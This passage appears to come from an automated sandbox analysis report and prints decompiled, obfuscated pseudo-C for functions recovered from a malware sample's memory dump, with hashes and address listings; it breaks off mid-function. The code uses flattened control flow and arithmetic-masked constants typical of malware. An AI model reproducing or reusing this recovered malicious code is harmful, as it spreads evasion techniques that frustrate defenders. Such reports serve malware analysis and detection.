                                                                                                                                                                                                                    • Opcode ID: 6bbdc4c81ebcad304e71935740889bce71f2ecf2fa3d017d8effdd6b07f0c3d2
                                                                                                                                                                                                                    • Instruction ID: ebbff60fdf57453e907303db952316202e417b660eb469fa6e2d724ca49cbe10
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6bbdc4c81ebcad304e71935740889bce71f2ecf2fa3d017d8effdd6b07f0c3d2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 947122720093009FC358CF25D98991FBAF1FBC9768F109A4DF69A96260C3B1CA498F57
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                                                                    			E00A73C28(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                    				void* _v40;
                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				void* _t110;
                                                                                                                                                                                                                    				signed int _t128;
                                                                                                                                                                                                                    				void* _t135;
                                                                                                                                                                                                                    				signed int _t150;
                                                                                                                                                                                                                    				signed int* _t152;
                                                                                                                                                                                                                    				void* _t154;
                                                                                                                                                                                                                    				void* _t155;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t133 = _a16;
                                                                                                                                                                                                                    				_push(_a16);
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_t152 = __ecx;
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t110);
                                                                                                                                                                                                                    				_v44 = 0x4984b5;
                                                                                                                                                                                                                    				_t155 = _t154 + 0x18;
                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                    				_t135 = 0x1db9ba9;
                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                    				_v76 = 0xce45e6;
                                                                                                                                                                                                                    				_v76 = _v76 | 0xffdce9df;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x15308a9f;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0xeaee6760;
                                                                                                                                                                                                                    				_v64 = 0x76dc30;
                                                                                                                                                                                                                    				_t150 = 0x7a;
                                                                                                                                                                                                                    				_v64 = _v64 * 0x7c;
                                                                                                                                                                                                                    				_v64 = _v64 + 0xffff8ce6;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x399f8fdb;
                                                                                                                                                                                                                    				_v48 = 0xc527f1;
                                                                                                                                                                                                                    				_v48 = _v48 + 0xfffff596;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x00c11ff6;
                                                                                                                                                                                                                    				_v52 = 0x704397;
                                                                                                                                                                                                                    				_v52 = _v52 >> 0xf;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x000a8952;
                                                                                                                                                                                                                    				_v88 = 0x573dd5;
                                                                                                                                                                                                                    				_v88 = _v88 << 8;
                                                                                                                                                                                                                    				_v88 = _v88 * 0x60;
                                                                                                                                                                                                                    				_v88 = _v88 + 0x697d;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0xb7331cf2;
                                                                                                                                                                                                                    				_v68 = 0xeebca6;
                                                                                                                                                                                                                    				_v68 = _v68 + 0x6604;
                                                                                                                                                                                                                    				_v68 = _v68 + 0xffff5289;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x00effeb2;
                                                                                                                                                                                                                    				_v72 = 0x654591;
                                                                                                                                                                                                                    				_v72 = _v72 + 0xc2c5;
                                                                                                                                                                                                                    				_v72 = _v72 * 0xd;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x0528077f;
                                                                                                                                                                                                                    				_v80 = 0xf68f33;
                                                                                                                                                                                                                    				_v80 = _v80 * 0x7c;
                                                                                                                                                                                                                    				_v80 = _v80 / _t150;
                                                                                                                                                                                                                    				_v80 = _v80 + 0xc70c;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0x00f642ae;
                                                                                                                                                                                                                    				_v84 = 0xf89df0;
                                                                                                                                                                                                                    				_v84 = _v84 * 0x37;
                                                                                                                                                                                                                    				_v84 = _v84 + 0xffffce86;
                                                                                                                                                                                                                    				_v84 = _v84 >> 0xf;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0x00009d02;
                                                                                                                                                                                                                    				_v56 = 0x729d89;
                                                                                                                                                                                                                    				_v56 = _v56 | 0xba0fd1ad;
                                                                                                                                                                                                                    				_v56 = _v56 >> 0xf;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x000952aa;
                                                                                                                                                                                                                    				_v60 = 0x62662e;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x9fbe2536;
                                                                                                                                                                                                                    				_v60 = _v60 >> 6;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x0273f661;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t135 != 0x1db9ba9) {
                                                                                                                                                                                                                    						if(_t135 == 0x4031b1d) {
                                                                                                                                                                                                                    							_t152[1] = E00A70074(_t133);
                                                                                                                                                                                                                    							_t135 = 0x8c8ce42;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t135 == 0x5b9f9fa) {
                                                                                                                                                                                                                    								E00A6B7B7(_v56, _t133 + 4, __eflags, _v60,  &_v28);
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t135 == 0x8c8ce42) {
                                                                                                                                                                                                                    									_t128 = E00A7C6D9(_t152[1]);
                                                                                                                                                                                                                    									 *_t152 = _t128;
                                                                                                                                                                                                                    									__eflags = _t128;
                                                                                                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                                                                                                    										_t135 = 0xa8530fb;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t135 == 0xa12a850) {
                                                                                                                                                                                                                    										E00A6DA0C(_v80,  *_t133,  &_v28, _v84);
                                                                                                                                                                                                                    										_t155 = _t155 + 8;
                                                                                                                                                                                                                    										_t135 = 0x5b9f9fa;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t135 != 0xa8530fb) {
                                                                                                                                                                                                                    											goto L13;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											E00A773B3(_v52, _v88,  &_v28, _t152, _v68, _v72);
                                                                                                                                                                                                                    											_t155 = _t155 + 0x10;
                                                                                                                                                                                                                    											_t135 = 0xa12a850;
                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                                    						__eflags =  *_t152;
                                                                                                                                                                                                                    						_t109 =  *_t152 != 0;
                                                                                                                                                                                                                    						__eflags = _t109;
                                                                                                                                                                                                                    						return 0 | _t109;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t135 = 0x4031b1d;
                                                                                                                                                                                                                    					 *_t152 =  *_t152 & 0x00000000;
                                                                                                                                                                                                                    					__eflags =  *_t152;
                                                                                                                                                                                                                    					_t152[1] = _v76;
                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                    					__eflags = _t135 - 0x900f0d;
                                                                                                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                                                                                                    				goto L16;
                                                                                                                                                                                                                    			}
























                                                                                                                                                                                                                    0x00a73c2c
                                                                                                                                                                                                                    0x00a73c33
                                                                                                                                                                                                                    0x00a73c34
                                                                                                                                                                                                                    0x00a73c38
                                                                                                                                                                                                                    0x00a73c3a
                                                                                                                                                                                                                    0x00a73c3e
                                                                                                                                                                                                                    0x00a73c43
                                                                                                                                                                                                                    0x00a73c44
                                                                                                                                                                                                                    0x00a73c49
                                                                                                                                                                                                                    0x00a73c57
                                                                                                                                                                                                                    0x00a73c5a
                                                                                                                                                                                                                    0x00a73c5d
                                                                                                                                                                                                                    0x00a73c69
                                                                                                                                                                                                                    0x00a73c6a
                                                                                                                                                                                                                    0x00a73c6b
                                                                                                                                                                                                                    0x00a73c73
                                                                                                                                                                                                                    0x00a73c7b
                                                                                                                                                                                                                    0x00a73c83
                                                                                                                                                                                                                    0x00a73c8b
                                                                                                                                                                                                                    0x00a73c98
                                                                                                                                                                                                                    0x00a73c99
                                                                                                                                                                                                                    0x00a73c9d
                                                                                                                                                                                                                    0x00a73ca5
                                                                                                                                                                                                                    0x00a73cad
                                                                                                                                                                                                                    0x00a73cb5
                                                                                                                                                                                                                    0x00a73cbd
                                                                                                                                                                                                                    0x00a73cc5
                                                                                                                                                                                                                    0x00a73ccd
                                                                                                                                                                                                                    0x00a73cd2
                                                                                                                                                                                                                    0x00a73cda
                                                                                                                                                                                                                    0x00a73ce2
                                                                                                                                                                                                                    0x00a73cec
                                                                                                                                                                                                                    0x00a73cf0
                                                                                                                                                                                                                    0x00a73cf8
                                                                                                                                                                                                                    0x00a73d00
                                                                                                                                                                                                                    0x00a73d08
                                                                                                                                                                                                                    0x00a73d10
                                                                                                                                                                                                                    0x00a73d18
                                                                                                                                                                                                                    0x00a73d20
                                                                                                                                                                                                                    0x00a73d28
                                                                                                                                                                                                                    0x00a73d35
                                                                                                                                                                                                                    0x00a73d39
                                                                                                                                                                                                                    0x00a73d41
                                                                                                                                                                                                                    0x00a73d4e
                                                                                                                                                                                                                    0x00a73d5d
                                                                                                                                                                                                                    0x00a73d61
                                                                                                                                                                                                                    0x00a73d69
                                                                                                                                                                                                                    0x00a73d71
                                                                                                                                                                                                                    0x00a73d7e
                                                                                                                                                                                                                    0x00a73d82
                                                                                                                                                                                                                    0x00a73d8a
                                                                                                                                                                                                                    0x00a73d8f
                                                                                                                                                                                                                    0x00a73d97
                                                                                                                                                                                                                    0x00a73d9f
                                                                                                                                                                                                                    0x00a73da7
                                                                                                                                                                                                                    0x00a73dac
                                                                                                                                                                                                                    0x00a73db4
                                                                                                                                                                                                                    0x00a73dbc
                                                                                                                                                                                                                    0x00a73dc4
                                                                                                                                                                                                                    0x00a73dc9
                                                                                                                                                                                                                    0x00a73dd1
                                                                                                                                                                                                                    0x00a73dd1
                                                                                                                                                                                                                    0x00a73ddf
                                                                                                                                                                                                                    0x00a73e71
                                                                                                                                                                                                                    0x00a73e74
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a73de5
                                                                                                                                                                                                                    0x00a73deb
                                                                                                                                                                                                                    0x00a73ea8
                                                                                                                                                                                                                    0x00a73df1
                                                                                                                                                                                                                    0x00a73df7
                                                                                                                                                                                                                    0x00a73e57
                                                                                                                                                                                                                    0x00a73e5c
                                                                                                                                                                                                                    0x00a73e5f
                                                                                                                                                                                                                    0x00a73e61
                                                                                                                                                                                                                    0x00a73e63
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a73e63
                                                                                                                                                                                                                    0x00a73df9
                                                                                                                                                                                                                    0x00a73dff
                                                                                                                                                                                                                    0x00a73e3d
                                                                                                                                                                                                                    0x00a73e42
                                                                                                                                                                                                                    0x00a73e45
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a73e01
                                                                                                                                                                                                                    0x00a73e03
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a73e09
                                                                                                                                                                                                                    0x00a73e1f
                                                                                                                                                                                                                    0x00a73e24
                                                                                                                                                                                                                    0x00a73e27
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a73e27
                                                                                                                                                                                                                    0x00a73e03
                                                                                                                                                                                                                    0x00a73dff
                                                                                                                                                                                                                    0x00a73df7
                                                                                                                                                                                                                    0x00a73deb
                                                                                                                                                                                                                    0x00a73eaf
                                                                                                                                                                                                                    0x00a73eb1
                                                                                                                                                                                                                    0x00a73eb6
                                                                                                                                                                                                                    0x00a73eb6
                                                                                                                                                                                                                    0x00a73ebd
                                                                                                                                                                                                                    0x00a73ebd
                                                                                                                                                                                                                    0x00a73e82
                                                                                                                                                                                                                    0x00a73e84
                                                                                                                                                                                                                    0x00a73e84
                                                                                                                                                                                                                    0x00a73e87
                                                                                                                                                                                                                    0x00a73e8a
                                                                                                                                                                                                                    0x00a73e8a
                                                                                                                                                                                                                    0x00a73e8a
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: .fb$`g$}i
                                                                                                                                                                                                                    • API String ID: 0-1892733903
                                                                                                                                                                                                                    • Opcode ID: d5a3ace7625bf93d8922380d712e66616ff17532aa259763d536e5871d0c03ad
                                                                                                                                                                                                                    • Instruction ID: 6463c4e9594f7d68464c9c43c45d6978664e8c8b6129865d8febaa9b6396d3dd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5a3ace7625bf93d8922380d712e66616ff17532aa259763d536e5871d0c03ad
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 956175721093029FC758CF65C98942BFBE1EFC8358F20891EF59A96260D3B4CA099F47
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                    			E00A6E3C6(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                    				void* _t121;
                                                                                                                                                                                                                    				void* _t132;
                                                                                                                                                                                                                    				intOrPtr* _t137;
                                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                                    				intOrPtr _t148;
                                                                                                                                                                                                                    				signed int _t149;
                                                                                                                                                                                                                    				void* _t151;
                                                                                                                                                                                                                    				void* _t152;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t147 = _a12;
                                                                                                                                                                                                                    				_t137 = __edx;
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t121);
                                                                                                                                                                                                                    				_v48 = 0x406a52;
                                                                                                                                                                                                                    				_t148 = 0;
                                                                                                                                                                                                                    				_v44 = 0x171415;
                                                                                                                                                                                                                    				_t152 = _t151 + 0x14;
                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                                    				_t139 = 0xb20f280;
                                                                                                                                                                                                                    				_v100 = 0x89fa20;
                                                                                                                                                                                                                    				_v100 = _v100 >> 2;
                                                                                                                                                                                                                    				_v100 = _v100 << 5;
                                                                                                                                                                                                                    				_v100 = _v100 << 2;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0x113f4400;
                                                                                                                                                                                                                    				_v52 = 0x985ed0;
                                                                                                                                                                                                                    				_v52 = _v52 + 0xb1fa;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x009910ca;
                                                                                                                                                                                                                    				_v60 = 0xb5f876;
                                                                                                                                                                                                                    				_v60 = _v60 << 0xe;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x7e189193;
                                                                                                                                                                                                                    				_v80 = 0xfad5fd;
                                                                                                                                                                                                                    				_t149 = 0x4e;
                                                                                                                                                                                                                    				_v80 = _v80 * 0x57;
                                                                                                                                                                                                                    				_v80 = _v80 * 0x6e;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0xa0f45e8c;
                                                                                                                                                                                                                    				_v84 = 0xd02ad3;
                                                                                                                                                                                                                    				_v84 = _v84 * 0x26;
                                                                                                                                                                                                                    				_v84 = _v84 >> 3;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0x03da062d;
                                                                                                                                                                                                                    				_v88 = 0xb08089;
                                                                                                                                                                                                                    				_v88 = _v88 >> 0xd;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0xfccfe801;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0xfcc39455;
                                                                                                                                                                                                                    				_v64 = 0xb382f1;
                                                                                                                                                                                                                    				_v64 = _v64 << 0xb;
                                                                                                                                                                                                                    				_v64 = _v64 >> 5;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x04ee3143;
                                                                                                                                                                                                                    				_v68 = 0x862c4;
                                                                                                                                                                                                                    				_v68 = _v68 | 0x8e0ae2be;
                                                                                                                                                                                                                    				_v68 = _v68 + 0xd8f6;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x8e00766f;
                                                                                                                                                                                                                    				_v92 = 0x2e496d;
                                                                                                                                                                                                                    				_v92 = _v92 + 0x7f0d;
                                                                                                                                                                                                                    				_v92 = _v92 * 0x52;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x68dcbe41;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x6624fae6;
                                                                                                                                                                                                                    				_v96 = 0xc1c7ae;
                                                                                                                                                                                                                    				_v96 = _v96 << 6;
                                                                                                                                                                                                                    				_v96 = _v96 * 0x2e;
                                                                                                                                                                                                                    				_v96 = _v96 << 1;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0x68ff45c1;
                                                                                                                                                                                                                    				_v72 = 0x68b421;
                                                                                                                                                                                                                    				_v72 = _v72 + 0xffff393d;
                                                                                                                                                                                                                    				_v72 = _v72 / _t149;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x000f18d9;
                                                                                                                                                                                                                    				_v56 = 0xd8f9c0;
                                                                                                                                                                                                                    				_v56 = _v56 * 0x3a;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x312a0c6f;
                                                                                                                                                                                                                    				_v76 = 0xad6558;
                                                                                                                                                                                                                    				_v76 = _v76 + 0x6500;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0xc959ece0;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0xc9febead;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t139 != 0xb20f280) {
                                                                                                                                                                                                                    						if(_t139 == 0xbec2ec0) {
                                                                                                                                                                                                                    							_t132 = E00A69082( *_t147,  *((intOrPtr*)(_t147 + 4)), _v60, _v80, _v84, _v88,  &_v32);
                                                                                                                                                                                                                    							_t152 = _t152 + 0x18;
                                                                                                                                                                                                                    							if(_t132 != 0) {
                                                                                                                                                                                                                    								_t139 = 0xffabc33;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t139 != 0xffabc33) {
                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								E00A6F15A(_t139, _v64,  *((intOrPtr*)( *0xa83208 + 4)), _v68, _v92, _v96,  &_v32, _v72, _v56, _v76, _v100,  *_t137,  *((intOrPtr*)(_t137 + 4)));
                                                                                                                                                                                                                    								_t148 =  ==  ? 1 : _t148;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L5:
                                                                                                                                                                                                                    						return _t148;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t139 = 0xbec2ec0;
                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                    				} while (_t139 != 0x7bfdd30);
                                                                                                                                                                                                                    				goto L5;
                                                                                                                                                                                                                    			}





























                                                                                                                                                                                                                    0x00a6e3cd
                                                                                                                                                                                                                    0x00a6e3d4
                                                                                                                                                                                                                    0x00a6e3d6
                                                                                                                                                                                                                    0x00a6e3d7
                                                                                                                                                                                                                    0x00a6e3de
                                                                                                                                                                                                                    0x00a6e3e5
                                                                                                                                                                                                                    0x00a6e3e6
                                                                                                                                                                                                                    0x00a6e3e7
                                                                                                                                                                                                                    0x00a6e3ec
                                                                                                                                                                                                                    0x00a6e3f4
                                                                                                                                                                                                                    0x00a6e3f6
                                                                                                                                                                                                                    0x00a6e3fe
                                                                                                                                                                                                                    0x00a6e401
                                                                                                                                                                                                                    0x00a6e407
                                                                                                                                                                                                                    0x00a6e40b
                                                                                                                                                                                                                    0x00a6e410
                                                                                                                                                                                                                    0x00a6e418
                                                                                                                                                                                                                    0x00a6e41d
                                                                                                                                                                                                                    0x00a6e422
                                                                                                                                                                                                                    0x00a6e427
                                                                                                                                                                                                                    0x00a6e42f
                                                                                                                                                                                                                    0x00a6e437
                                                                                                                                                                                                                    0x00a6e43f
                                                                                                                                                                                                                    0x00a6e447
                                                                                                                                                                                                                    0x00a6e44f
                                                                                                                                                                                                                    0x00a6e454
                                                                                                                                                                                                                    0x00a6e45c
                                                                                                                                                                                                                    0x00a6e46b
                                                                                                                                                                                                                    0x00a6e46c
                                                                                                                                                                                                                    0x00a6e475
                                                                                                                                                                                                                    0x00a6e479
                                                                                                                                                                                                                    0x00a6e481
                                                                                                                                                                                                                    0x00a6e48e
                                                                                                                                                                                                                    0x00a6e492
                                                                                                                                                                                                                    0x00a6e497
                                                                                                                                                                                                                    0x00a6e49f
                                                                                                                                                                                                                    0x00a6e4a7
                                                                                                                                                                                                                    0x00a6e4ac
                                                                                                                                                                                                                    0x00a6e4b4
                                                                                                                                                                                                                    0x00a6e4bc
                                                                                                                                                                                                                    0x00a6e4c4
                                                                                                                                                                                                                    0x00a6e4c9
                                                                                                                                                                                                                    0x00a6e4ce
                                                                                                                                                                                                                    0x00a6e4d6
                                                                                                                                                                                                                    0x00a6e4de
                                                                                                                                                                                                                    0x00a6e4e6
                                                                                                                                                                                                                    0x00a6e4ee
                                                                                                                                                                                                                    0x00a6e4f6
                                                                                                                                                                                                                    0x00a6e4fe
                                                                                                                                                                                                                    0x00a6e50b
                                                                                                                                                                                                                    0x00a6e50f
                                                                                                                                                                                                                    0x00a6e517
                                                                                                                                                                                                                    0x00a6e51f
                                                                                                                                                                                                                    0x00a6e527
                                                                                                                                                                                                                    0x00a6e531
                                                                                                                                                                                                                    0x00a6e535
                                                                                                                                                                                                                    0x00a6e539
                                                                                                                                                                                                                    0x00a6e541
                                                                                                                                                                                                                    0x00a6e549
                                                                                                                                                                                                                    0x00a6e557
                                                                                                                                                                                                                    0x00a6e55b
                                                                                                                                                                                                                    0x00a6e563
                                                                                                                                                                                                                    0x00a6e570
                                                                                                                                                                                                                    0x00a6e574
                                                                                                                                                                                                                    0x00a6e57c
                                                                                                                                                                                                                    0x00a6e584
                                                                                                                                                                                                                    0x00a6e58c
                                                                                                                                                                                                                    0x00a6e594
                                                                                                                                                                                                                    0x00a6e5a1
                                                                                                                                                                                                                    0x00a6e5a1
                                                                                                                                                                                                                    0x00a6e5af
                                                                                                                                                                                                                    0x00a6e627
                                                                                                                                                                                                                    0x00a6e62c
                                                                                                                                                                                                                    0x00a6e631
                                                                                                                                                                                                                    0x00a6e633
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6e633
                                                                                                                                                                                                                    0x00a6e5b1
                                                                                                                                                                                                                    0x00a6e5b7
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6e5bd
                                                                                                                                                                                                                    0x00a6e5ef
                                                                                                                                                                                                                    0x00a6e600
                                                                                                                                                                                                                    0x00a6e600
                                                                                                                                                                                                                    0x00a6e5b7
                                                                                                                                                                                                                    0x00a6e604
                                                                                                                                                                                                                    0x00a6e60c
                                                                                                                                                                                                                    0x00a6e60c
                                                                                                                                                                                                                    0x00a6e63d
                                                                                                                                                                                                                    0x00a6e63f
                                                                                                                                                                                                                    0x00a6e63f
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: Rj@$mI.$ov
                                                                                                                                                                                                                    • API String ID: 0-1080711607
                                                                                                                                                                                                                    • Opcode ID: 63791bfd7af97499a546a8e807eaee319636f2b38b951c26ac2a012d68da07d8
                                                                                                                                                                                                                    • Instruction ID: 664a0c0a57ea3292e5f398ba820ba2808f09f3b28207ed67b9a3b348eac4e0d0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63791bfd7af97499a546a8e807eaee319636f2b38b951c26ac2a012d68da07d8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A610E71409341AFC754DF65CA8A81BFBF1FBC8B48F40591DF29696260D3B18A59CF82
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E00A62756(void* __ecx) {
                                                                                                                                                                                                                    				intOrPtr _v4;
                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                    				void* _t130;
                                                                                                                                                                                                                    				void* _t134;
                                                                                                                                                                                                                    				signed int _t136;
                                                                                                                                                                                                                    				signed int _t137;
                                                                                                                                                                                                                    				signed int _t138;
                                                                                                                                                                                                                    				intOrPtr* _t156;
                                                                                                                                                                                                                    				intOrPtr _t157;
                                                                                                                                                                                                                    				signed int* _t159;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t159 =  &_v56;
                                                                                                                                                                                                                    				_v8 = 0xa5034c;
                                                                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                                                                    				_t134 = __ecx;
                                                                                                                                                                                                                    				_v36 = 0x6b95a1;
                                                                                                                                                                                                                    				_t156 =  *0xa83b34 + 4;
                                                                                                                                                                                                                    				_t136 = 0x12;
                                                                                                                                                                                                                    				_v36 = _v36 / _t136;
                                                                                                                                                                                                                    				_v36 = _v36 + 0xffff05f8;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x0005000f;
                                                                                                                                                                                                                    				_v20 = 0x8b8364;
                                                                                                                                                                                                                    				_v20 = _v20 | 0xe7cf5637;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0xe7c6dfc0;
                                                                                                                                                                                                                    				_v40 = 0x8c338b;
                                                                                                                                                                                                                    				_t137 = 0x1a;
                                                                                                                                                                                                                    				_v40 = _v40 * 0x75;
                                                                                                                                                                                                                    				_v40 = _v40 | 0x4af7f9f8;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x4afa4850;
                                                                                                                                                                                                                    				_v16 = 0x9fd89e;
                                                                                                                                                                                                                    				_v16 = _v16 + 0x26a2;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x0093ca8e;
                                                                                                                                                                                                                    				_v56 = 0x640b20;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0xa9416605;
                                                                                                                                                                                                                    				_v56 = _v56 + 0xffff3d2e;
                                                                                                                                                                                                                    				_v56 = _v56 << 3;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x492dd1d6;
                                                                                                                                                                                                                    				_v12 = 0xaae572;
                                                                                                                                                                                                                    				_v12 = _v12 * 0x17;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0f5f2b6f;
                                                                                                                                                                                                                    				_v32 = 0xfbcaf2;
